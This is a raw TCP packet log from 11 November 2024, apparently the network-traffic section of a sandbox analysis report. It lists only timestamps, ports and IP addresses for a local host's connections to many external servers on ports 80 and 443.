Nov 11, 2024 18:13:08.938052893 CET	58899	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:08.979332924 CET	443	58899	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:11.557883024 CET	80	58860	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:11.557950020 CET	58860	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:11.604954004 CET	443	58899	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:11.605011940 CET	443	58899	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:11.605015039 CET	58899	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:11.605030060 CET	443	58899	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:11.605057955 CET	443	58899	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:11.605079889 CET	58899	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:11.605087042 CET	443	58899	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:11.605122089 CET	443	58899	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:11.605123997 CET	58899	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:11.605123997 CET	58899	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:11.605133057 CET	443	58899	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:11.605169058 CET	58899	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:11.605194092 CET	58899	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:11.605199099 CET	443	58899	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:11.605254889 CET	58899	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:11.605530024 CET	443	58899	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:11.605604887 CET	58899	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:11.605604887 CET	58899	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:11.605604887 CET	58899	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:11.605618000 CET	443	58899	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:11.605715036 CET	58899	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:11.699630022 CET	58927	80	192.168.2.6	64.225.91.73
Nov 11, 2024 18:13:11.705117941 CET	80	58927	64.225.91.73	192.168.2.6
Nov 11, 2024 18:13:11.705182076 CET	58927	80	192.168.2.6	64.225.91.73
Nov 11, 2024 18:13:11.706023932 CET	58927	80	192.168.2.6	64.225.91.73
Nov 11, 2024 18:13:11.710845947 CET	80	58927	64.225.91.73	192.168.2.6
Nov 11, 2024 18:13:12.083494902 CET	62034	80	192.168.2.6	76.223.67.189
Nov 11, 2024 18:13:12.961796999 CET	80	58927	64.225.91.73	192.168.2.6
Nov 11, 2024 18:13:12.961855888 CET	58927	80	192.168.2.6	64.225.91.73
Nov 11, 2024 18:13:12.962002993 CET	62036	80	192.168.2.6	103.224.212.210
Nov 11, 2024 18:13:12.962304115 CET	62035	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:12.963176966 CET	62037	80	192.168.2.6	154.85.183.50
Nov 11, 2024 18:13:12.963551044 CET	80	58927	64.225.91.73	192.168.2.6
Nov 11, 2024 18:13:12.963612080 CET	58927	80	192.168.2.6	64.225.91.73
Nov 11, 2024 18:13:12.964209080 CET	80	58927	64.225.91.73	192.168.2.6
Nov 11, 2024 18:13:12.964271069 CET	58927	80	192.168.2.6	64.225.91.73
Nov 11, 2024 18:13:12.966746092 CET	80	62034	76.223.67.189	192.168.2.6
Nov 11, 2024 18:13:12.966820955 CET	62034	80	192.168.2.6	76.223.67.189
Nov 11, 2024 18:13:12.966931105 CET	62034	80	192.168.2.6	76.223.67.189
Nov 11, 2024 18:13:12.971293926 CET	80	62036	103.224.212.210	192.168.2.6
Nov 11, 2024 18:13:12.971304893 CET	80	62035	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:12.971323013 CET	80	62037	154.85.183.50	192.168.2.6
Nov 11, 2024 18:13:12.971393108 CET	62036	80	192.168.2.6	103.224.212.210
Nov 11, 2024 18:13:12.971415997 CET	62035	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:12.971430063 CET	62037	80	192.168.2.6	154.85.183.50
Nov 11, 2024 18:13:12.971513033 CET	62036	80	192.168.2.6	103.224.212.210
Nov 11, 2024 18:13:12.971652031 CET	62035	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:12.971883059 CET	80	62034	76.223.67.189	192.168.2.6
Nov 11, 2024 18:13:12.971950054 CET	62037	80	192.168.2.6	154.85.183.50
Nov 11, 2024 18:13:12.976322889 CET	80	62036	103.224.212.210	192.168.2.6
Nov 11, 2024 18:13:12.976370096 CET	80	62035	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:12.976931095 CET	80	62037	154.85.183.50	192.168.2.6
Nov 11, 2024 18:13:13.147245884 CET	62038	80	192.168.2.6	103.224.182.252
Nov 11, 2024 18:13:13.152098894 CET	80	62038	103.224.182.252	192.168.2.6
Nov 11, 2024 18:13:13.152198076 CET	62038	80	192.168.2.6	103.224.182.252
Nov 11, 2024 18:13:13.154115915 CET	62038	80	192.168.2.6	103.224.182.252
Nov 11, 2024 18:13:13.159367085 CET	80	62038	103.224.182.252	192.168.2.6
Nov 11, 2024 18:13:13.401648998 CET	80	62035	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:13.401819944 CET	62035	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:13.402798891 CET	80	62034	76.223.67.189	192.168.2.6
Nov 11, 2024 18:13:13.403376102 CET	62034	80	192.168.2.6	76.223.67.189
Nov 11, 2024 18:13:13.403965950 CET	62035	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:13.407500029 CET	80	62035	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:13.407598972 CET	62035	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:13.409940958 CET	80	62035	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:13.522627115 CET	80	62036	103.224.212.210	192.168.2.6
Nov 11, 2024 18:13:13.523144007 CET	62036	80	192.168.2.6	103.224.212.210
Nov 11, 2024 18:13:13.525604010 CET	62036	80	192.168.2.6	103.224.212.210
Nov 11, 2024 18:13:13.532200098 CET	80	62036	103.224.212.210	192.168.2.6
Nov 11, 2024 18:13:13.532280922 CET	62036	80	192.168.2.6	103.224.212.210
Nov 11, 2024 18:13:13.737201929 CET	80	62038	103.224.182.252	192.168.2.6
Nov 11, 2024 18:13:13.737442970 CET	62038	80	192.168.2.6	103.224.182.252
Nov 11, 2024 18:13:13.739430904 CET	62038	80	192.168.2.6	103.224.182.252
Nov 11, 2024 18:13:13.745062113 CET	80	62038	103.224.182.252	192.168.2.6
Nov 11, 2024 18:13:13.745157957 CET	62038	80	192.168.2.6	103.224.182.252
Nov 11, 2024 18:13:13.807904959 CET	80	62037	154.85.183.50	192.168.2.6
Nov 11, 2024 18:13:13.807991028 CET	62037	80	192.168.2.6	154.85.183.50
Nov 11, 2024 18:13:13.858683109 CET	62037	80	192.168.2.6	154.85.183.50
Nov 11, 2024 18:13:13.864399910 CET	80	62037	154.85.183.50	192.168.2.6
Nov 11, 2024 18:13:13.882671118 CET	62050	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:13.887665987 CET	80	62050	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:13.887823105 CET	62050	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:13.888042927 CET	62050	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:13.892874002 CET	80	62050	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:14.112021923 CET	62052	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:14.116902113 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:14.117002964 CET	62052	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:14.117108107 CET	62052	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:14.121903896 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:14.143414021 CET	80	62037	154.85.183.50	192.168.2.6
Nov 11, 2024 18:13:14.143551111 CET	62037	80	192.168.2.6	154.85.183.50
Nov 11, 2024 18:13:14.313991070 CET	80	62050	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:14.314057112 CET	62050	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:14.314696074 CET	80	62050	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:14.314759970 CET	62050	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:14.807411909 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:14.807436943 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:14.807451963 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:14.807465076 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:14.807477951 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:14.807491064 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:14.807503939 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:14.807511091 CET	62052	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:14.807517052 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:14.807532072 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:14.807547092 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:14.807555914 CET	62052	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:14.807580948 CET	62052	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:14.807596922 CET	62052	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:14.812423944 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:14.812489033 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:14.812545061 CET	62052	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:14.896774054 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:14.896790981 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:14.896804094 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:14.896817923 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:14.896836042 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:14.896848917 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:14.896862984 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:14.896862984 CET	62052	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:14.896876097 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:14.896891117 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:14.896902084 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:14.896905899 CET	62052	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:14.896925926 CET	62052	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:14.896951914 CET	62052	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:15.846199036 CET	61112	80	192.168.2.6	64.225.91.73
Nov 11, 2024 18:13:15.851959944 CET	80	61112	64.225.91.73	192.168.2.6
Nov 11, 2024 18:13:15.852160931 CET	61112	80	192.168.2.6	64.225.91.73
Nov 11, 2024 18:13:15.852260113 CET	61112	80	192.168.2.6	64.225.91.73
Nov 11, 2024 18:13:15.858212948 CET	80	61112	64.225.91.73	192.168.2.6
Nov 11, 2024 18:13:16.141174078 CET	55436	80	192.168.2.6	72.52.179.174
Nov 11, 2024 18:13:16.146178961 CET	80	55436	72.52.179.174	192.168.2.6
Nov 11, 2024 18:13:16.146254063 CET	55436	80	192.168.2.6	72.52.179.174
Nov 11, 2024 18:13:16.146435022 CET	55436	80	192.168.2.6	72.52.179.174
Nov 11, 2024 18:13:16.151734114 CET	80	55436	72.52.179.174	192.168.2.6
Nov 11, 2024 18:13:16.408402920 CET	80	61112	64.225.91.73	192.168.2.6
Nov 11, 2024 18:13:16.408689022 CET	61112	80	192.168.2.6	64.225.91.73
Nov 11, 2024 18:13:16.640940905 CET	80	55436	72.52.179.174	192.168.2.6
Nov 11, 2024 18:13:16.641079903 CET	55436	80	192.168.2.6	72.52.179.174
Nov 11, 2024 18:13:16.641079903 CET	55436	80	192.168.2.6	72.52.179.174
Nov 11, 2024 18:13:16.646085978 CET	80	55436	72.52.179.174	192.168.2.6
Nov 11, 2024 18:13:16.675443888 CET	55442	80	192.168.2.6	72.52.179.174
Nov 11, 2024 18:13:16.680500984 CET	80	55442	72.52.179.174	192.168.2.6
Nov 11, 2024 18:13:16.680620909 CET	55442	80	192.168.2.6	72.52.179.174
Nov 11, 2024 18:13:16.680766106 CET	55442	80	192.168.2.6	72.52.179.174
Nov 11, 2024 18:13:16.685717106 CET	80	55442	72.52.179.174	192.168.2.6
Nov 11, 2024 18:13:17.174140930 CET	80	55442	72.52.179.174	192.168.2.6
Nov 11, 2024 18:13:17.174274921 CET	55442	80	192.168.2.6	72.52.179.174
Nov 11, 2024 18:13:17.185538054 CET	55442	80	192.168.2.6	72.52.179.174
Nov 11, 2024 18:13:17.190532923 CET	80	55442	72.52.179.174	192.168.2.6
Nov 11, 2024 18:13:19.881242990 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:19.881429911 CET	62052	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:19.916712046 CET	52002	80	192.168.2.6	52.34.198.229
Nov 11, 2024 18:13:19.921547890 CET	80	52002	52.34.198.229	192.168.2.6
Nov 11, 2024 18:13:19.921735048 CET	52002	80	192.168.2.6	52.34.198.229
Nov 11, 2024 18:13:19.921906948 CET	52002	80	192.168.2.6	52.34.198.229
Nov 11, 2024 18:13:19.926686049 CET	80	52002	52.34.198.229	192.168.2.6
Nov 11, 2024 18:13:20.604234934 CET	80	52002	52.34.198.229	192.168.2.6
Nov 11, 2024 18:13:20.604330063 CET	52002	80	192.168.2.6	52.34.198.229
Nov 11, 2024 18:13:20.605576992 CET	52002	80	192.168.2.6	52.34.198.229
Nov 11, 2024 18:13:20.611365080 CET	80	52002	52.34.198.229	192.168.2.6
Nov 11, 2024 18:13:20.611495972 CET	52002	80	192.168.2.6	52.34.198.229
Nov 11, 2024 18:13:22.879642963 CET	55368	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:22.885267019 CET	80	55368	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:22.885351896 CET	55368	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:22.885515928 CET	55368	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:22.890295029 CET	80	55368	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:23.313640118 CET	80	55368	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:23.313714027 CET	55368	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:23.315474033 CET	55368	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:23.320895910 CET	80	55368	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:23.321060896 CET	55368	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:24.319437981 CET	80	62050	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:24.319530964 CET	62050	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:24.625905037 CET	63292	80	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:24.630945921 CET	80	63292	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:24.631099939 CET	63292	80	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:24.633200884 CET	63292	80	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:24.633567095 CET	49712	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:13:24.638087034 CET	80	63292	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:24.638459921 CET	80	49712	154.212.231.82	192.168.2.6
Nov 11, 2024 18:13:24.734877110 CET	63293	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:24.736047029 CET	63294	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:24.739711046 CET	80	63293	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:24.742526054 CET	80	63294	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:24.742614031 CET	63293	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:24.742656946 CET	63294	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:24.744457960 CET	63294	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:24.749295950 CET	80	63294	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:24.762502909 CET	58859	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:24.767426014 CET	80	58859	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:24.994327068 CET	80	49712	154.212.231.82	192.168.2.6
Nov 11, 2024 18:13:24.994410992 CET	49712	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:13:25.004745007 CET	63293	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:25.009594917 CET	80	63293	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:25.060666084 CET	49712	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:13:25.065506935 CET	80	49712	154.212.231.82	192.168.2.6
Nov 11, 2024 18:13:25.072573900 CET	80	63292	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.072706938 CET	63292	80	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.072900057 CET	63292	80	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.078123093 CET	80	63292	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.078300953 CET	63292	80	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.085112095 CET	49709	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:13:25.085925102 CET	58860	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:25.086451054 CET	63298	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:25.087568045 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.087600946 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.087672949 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.087886095 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.087901115 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.090027094 CET	80	49709	208.100.26.245	192.168.2.6
Nov 11, 2024 18:13:25.090784073 CET	80	58860	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:25.091272116 CET	80	63298	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:25.091345072 CET	63298	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:25.091655970 CET	63298	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:25.096483946 CET	80	63298	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:25.107697010 CET	80	58859	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:25.107980013 CET	80	58859	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:25.108037949 CET	58859	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:25.152873039 CET	80	63293	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:25.154690027 CET	63293	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:25.154761076 CET	63293	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:25.159466982 CET	80	63293	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:25.189330101 CET	80	49709	208.100.26.245	192.168.2.6
Nov 11, 2024 18:13:25.189398050 CET	49709	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:13:25.196286917 CET	80	63294	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:25.196300030 CET	80	63294	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:25.196353912 CET	63294	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:25.197432041 CET	63294	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:25.197458029 CET	63294	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:25.361349106 CET	63302	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:25.366254091 CET	80	63302	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:25.366326094 CET	63302	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:25.366452932 CET	63302	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:25.371356964 CET	80	63302	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:25.394746065 CET	63303	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:25.394773006 CET	443	63303	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:25.394841909 CET	63303	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:25.395504951 CET	63303	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:25.395518064 CET	443	63303	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:25.396053076 CET	49709	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:13:25.400863886 CET	80	49709	208.100.26.245	192.168.2.6
Nov 11, 2024 18:13:25.409483910 CET	80	49712	154.212.231.82	192.168.2.6
Nov 11, 2024 18:13:25.409595966 CET	49712	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:13:25.499149084 CET	80	49709	208.100.26.245	192.168.2.6
Nov 11, 2024 18:13:25.499222040 CET	49709	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:13:25.524069071 CET	80	63298	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:25.524106979 CET	80	63298	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:25.524137020 CET	63298	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:25.524166107 CET	63298	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:25.528289080 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.528363943 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.528750896 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.528764963 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.528960943 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.528965950 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.618583918 CET	63305	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:25.623492002 CET	80	63305	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:25.623559952 CET	63305	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:25.623681068 CET	63305	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:25.628494978 CET	80	63305	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:25.859560013 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.859610081 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.859630108 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.859647036 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.859661102 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.859673023 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.859699965 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.859709024 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.859715939 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.859741926 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.859771967 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.860285044 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.860358953 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.864703894 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.864774942 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.869839907 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.869848013 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.869919062 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.869936943 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.870093107 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.870134115 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.870197058 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.870198011 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.870209932 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.870263100 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.870263100 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.872530937 CET	80	63302	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:25.872634888 CET	63302	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:25.874942064 CET	443	63303	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:25.875020027 CET	63303	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:25.881210089 CET	63302	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:25.881787062 CET	63303	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:25.881802082 CET	443	63303	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:25.882056952 CET	443	63303	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:25.882108927 CET	63303	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:25.886136055 CET	80	63302	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:25.887269974 CET	63303	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:25.931329012 CET	443	63303	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:25.942703962 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.942745924 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.942789078 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.942805052 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.942851067 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.942851067 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.944307089 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.944339991 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.944369078 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.944380999 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.944408894 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.944422960 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:25.944482088 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.944639921 CET	63299	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:25.944654942 CET	443	63299	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:26.149998903 CET	80	63305	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:26.150072098 CET	63305	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:26.150424957 CET	80	63305	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:26.150481939 CET	63305	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:26.150516987 CET	63305	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:26.150561094 CET	63305	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:26.704392910 CET	443	63303	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:26.704440117 CET	443	63303	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:26.704474926 CET	443	63303	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:26.704503059 CET	443	63303	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:26.704505920 CET	63303	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:26.704515934 CET	443	63303	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:26.704549074 CET	63303	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:26.704567909 CET	63303	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:26.704571962 CET	443	63303	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:26.704617023 CET	63303	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:26.704976082 CET	443	63303	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:26.705024004 CET	443	63303	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:26.705079079 CET	63303	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:26.705084085 CET	443	63303	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:26.705127954 CET	63303	443	192.168.2.6	188.114.96.3
